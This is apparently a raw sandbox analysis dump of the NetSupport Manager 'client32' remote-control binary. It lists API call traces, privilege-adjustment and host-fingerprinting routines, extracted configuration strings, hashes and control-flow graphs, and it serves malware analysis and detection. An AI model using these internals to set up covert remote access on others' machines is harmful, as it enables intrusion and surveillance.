                                                                                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109D46D
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2349140579-0
                                                                                                                                                                • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                                                                                • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                                                                                                • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                                                                                • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                                                                                                Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                                                                                • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                                                                                                • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                                                                                • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                                                                                                Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                                                                                                  • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                                                                                                  • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                                                                                                  • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                                                                                                • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                                                                                                  • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                                                                                                  • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                                                                                                  • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                                                                                  • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                                                                                                • SetWindowPos.USER32(000802A6,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                                                                                                • wsprintfA.USER32 ref: 1102FFA5
                                                                                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                                                                                                  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,59FD48C0,00000002,75732EE0), ref: 1112820A
                                                                                                                                                                  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                                                                                                  • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$562258$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                                                                                • API String ID: 1099283604-2621191230
                                                                                                                                                                • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                                                                                • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                                                                                                • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                                                                                • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52
                                                                                                                                                                Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 994 1102db00-1102db50 call 1110f420 997 1102db52-1102db66 call 11142a60 994->997 998 1102db68 994->998 1000 1102db6e-1102dbb3 call 11142290 call 11142ac0 997->1000 998->1000 1006 1102dd53-1102dd62 call 11144dc0 1000->1006 1007 1102dbb9 1000->1007 1016 1102dd68-1102dd78 1006->1016 1009 1102dbc0-1102dbc3 1007->1009 1010 1102dbc5-1102dbc7 1009->1010 1011 1102dbe8-1102dbf1 1009->1011 1013 1102dbd0-1102dbe1 1010->1013 1014 1102dbf7-1102dbfe 1011->1014 1015 1102dd24-1102dd3d call 11142ac0 1011->1015 1013->1013 1017 1102dbe3 1013->1017 1014->1015 1018 1102dcf3-1102dd08 call 11162de7 1014->1018 1019 1102dc05-1102dc07 1014->1019 1020 1102dd0a-1102dd1f call 11162de7 1014->1020 1021 1102dc9a-1102dccd call 111618c1 call 11142290 1014->1021 1022 1102dcdb-1102dcf1 call 11164010 1014->1022 1023 1102dc8b-1102dc95 1014->1023 1024 1102dccf-1102dcd9 1014->1024 1025 1102dc4c-1102dc52 1014->1025 1026 1102dc7c-1102dc86 1014->1026 1015->1009 1044 1102dd43-1102dd45 1015->1044 1028 1102dd7a 1016->1028 1029 1102dd7f-1102dd93 call 1102cc10 1016->1029 1017->1015 1018->1015 1019->1015 1032 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1019->1032 1020->1015 1021->1015 1022->1015 1023->1015 1024->1015 1034 1102dc54-1102dc68 call 11162de7 1025->1034 1035 1102dc6d-1102dc77 1025->1035 1026->1015 1028->1029 1040 1102dd98-1102dd9d 1029->1040 1032->1015 1034->1015 1035->1015 1048 1102de43-1102de5d call 111463d0 1040->1048 1051 1102dda3-1102ddc8 call 110b7920 call 11146450 1040->1051 1044->1048 1049 1102dd4b-1102dd51 1044->1049 1061 1102deb3-1102debf call 1102b4f0 1048->1061 1062 1102de5f-1102de78 call 1105dd10 1048->1062 1049->1006 1049->1016 1069 1102ddd3-1102ddd9 1051->1069 1070 1102ddca-1102ddd1 1051->1070 1074 1102dec1-1102dec8 1061->1074 1075 1102de98-1102de9f 1061->1075 1062->1061 1073 1102de7a-1102de8c 1062->1073 1076 1102dddb-1102dde2 call 11027d60 1069->1076 1077 1102de39 1069->1077 1070->1048 1073->1061 1093 1102de8e 1073->1093 1078 1102dea5-1102dea8 1074->1078 1080 1102deca-1102ded4 1074->1080 1075->1078 1079 1102e0aa-1102e0cb GetComputerNameA 1075->1079 1076->1077 1092 1102dde4-1102de16 1076->1092 1077->1048 1083 1102deaa-1102deb1 call 110b7920 1078->1083 1084 1102ded9 1078->1084 1086 1102e103-1102e109 1079->1086 1087 1102e0cd-1102e101 call 11027c30 1079->1087 1080->1079 1091 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1083->1091 1084->1091 1089 1102e10b-1102e110 1086->1089 1090 1102e13f-1102e152 call 11164010 1086->1090 1087->1086 1115 1102e157-1102e163 1087->1115 1095 1102e116-1102e11a 1089->1095 1109 1102e347-1102e36a 1090->1109 1141 1102e07a-1102e082 SetLastError 1091->1141 1142 1102dfbc-1102dfd3 1091->1142 1111 1102de20-1102de2f call 110f6080 1092->1111 1112 1102de18-1102de1e 1092->1112 1093->1075 1100 1102e136-1102e138 1095->1100 1101 1102e11c-1102e11e 1095->1101 1108 1102e13b-1102e13d 1100->1108 1106 1102e132-1102e134 1101->1106 1107 1102e120-1102e126 1101->1107 1106->1108 1107->1100 1116 1102e128-1102e130 1107->1116 1108->1090 1108->1115 1127 1102e392-1102e39a 1109->1127 1128 1102e36c-1102e372 1109->1128 1113 1102de32-1102de34 call 1102d330 1111->1113 1112->1111 1112->1113 1113->1077 1122 1102e165-1102e17a call 110b7920 call 11029bd0 1115->1122 1123 1102e17c-1102e18f call 11081a70 1115->1123 1116->1095 1116->1106 1149 1102e1d3-1102e1ec call 11081a70 1122->1149 1139 1102e191-1102e1b4 1123->1139 1140 1102e1b6-1102e1b8 1123->1140 1131 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1127->1131 1132 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1127->1132 1128->1127 1130 1102e374-1102e38d call 1102d330 1128->1130 1130->1127 1132->1131 1139->1149 1147 1102e1c0-1102e1d1 1140->1147 1151 1102e043-1102e04f 1141->1151 1142->1151 1162 1102dfd5-1102dfde 1142->1162 1147->1147 1147->1149 1166 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1149->1166 1167 1102e32c-1102e339 call 11164010 1149->1167 1155 1102e092-1102e0a1 1151->1155 1156 1102e051-1102e05d 1151->1156 1155->1079 1164 1102e0a3-1102e0a4 FreeLibrary 1155->1164 1160 1102e06f-1102e073 1156->1160 1161 1102e05f-1102e06d GetProcAddress 1156->1161 1169 1102e084-1102e086 SetLastError 1160->1169 1170 1102e075-1102e078 1160->1170 1161->1160 1162->1151 1168 1102dfe0-1102e016 call 11146450 call 1112b270 1162->1168 1164->1079 1206 1102e283-1102e299 call 11128ec0 1166->1206 1207 1102e26f-1102e27e call 11029450 1166->1207 1183 1102e33c-1102e341 CharUpperA 1167->1183 1168->1151 1190 1102e018-1102e03e call 11146450 call 11027920 1168->1190 1175 1102e08c 1169->1175 1170->1175 1175->1155 1183->1109 1190->1151 1211 1102e2b2-1102e2ec call 110d0bd0 * 2 1206->1211 1212 1102e29b-1102e2ad call 110d0bd0 1206->1212 1207->1206 1219 1102e302-1102e32a call 11164010 call 110d07c0 1211->1219 1220 1102e2ee-1102e2fd call 11029450 1211->1220 1212->1211 1219->1183 1220->1219
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memsetwsprintf
                                                                                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                • API String ID: 3802068140-38229974
                                                                                                                                                                • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                                                                                • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                                                                                                • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                                                                                • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
                                                                                                                                                                Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1661 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 1662 110a9cf8-110a9d09 SetupDiGetClassDevsA 1661->1662 1663 110a9e05-110a9e0d SetLastError 1661->1663 1664 110a9d0f-110a9d1d 1662->1664 1665 110a9f13-110a9f15 1662->1665 1668 110a9e19-110a9e1b SetLastError 1663->1668 1669 110a9d20-110a9d24 1664->1669 1666 110a9f1e-110a9f20 1665->1666 1667 110a9f17-110a9f18 FreeLibrary 1665->1667 1670 110a9f37-110a9f52 call 11161d01 1666->1670 1667->1666 1671 110a9e21-110a9e2c GetLastError 1668->1671 1672 110a9d3d-110a9d55 1669->1672 1673 110a9d26-110a9d37 GetProcAddress 1669->1673 1674 110a9e32-110a9e3d call 11162be5 1671->1674 1675 110a9ec0-110a9ed1 GetProcAddress 1671->1675 1672->1671 1684 110a9d5b-110a9d5d 1672->1684 1673->1668 1673->1672 1674->1669 1678 110a9edb-110a9edd SetLastError 1675->1678 1679 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 1675->1679 1683 110a9ee3-110a9ee5 1678->1683 1679->1683 1683->1665 1687 110a9ee7-110a9f09 CreateFileA 1683->1687 1685 110a9d68-110a9d6a 1684->1685 1686 110a9d5f-110a9d65 call 11162be5 1684->1686 1689 110a9d6c-110a9d7f GetProcAddress 1685->1689 1690 110a9d85-110a9d9b 1685->1690 1686->1685 1691 110a9f0b-110a9f10 call 11162be5 1687->1691 1692 110a9f22-110a9f2c call 11162be5 1687->1692 1689->1690 1695 110a9e42-110a9e4a SetLastError 1689->1695 1700 110a9d9d-110a9da6 GetLastError 1690->1700 1701 110a9dac-110a9dbf call 11162b51 1690->1701 1691->1665 1702 110a9f2e-110a9f2f FreeLibrary 1692->1702 1703 110a9f35 1692->1703 1695->1700 1700->1701 1704 110a9e81-110a9e92 call 110a9c30 1700->1704 1711 110a9ea2-110a9eb3 call 110a9c30 1701->1711 1712 110a9dc5-110a9dcd 1701->1712 1702->1703 1703->1670 1709 110a9e9b-110a9e9d 1704->1709 1710 110a9e94-110a9e95 FreeLibrary 1704->1710 1709->1670 1710->1709 1711->1709 1719 110a9eb5-110a9ebe FreeLibrary 1711->1719 1714 110a9dcf-110a9de2 GetProcAddress 1712->1714 1715 110a9de4-110a9dfb 1712->1715 1714->1715 1717 110a9e4f-110a9e51 SetLastError 1714->1717 1720 110a9e57-110a9e71 call 110a9c30 call 11162be5 1715->1720 1721 110a9dfd-110a9e00 1715->1721 1717->1720 1719->1670 1720->1709 1726 110a9e73-110a9e7c FreeLibrary 1720->1726 1721->1669 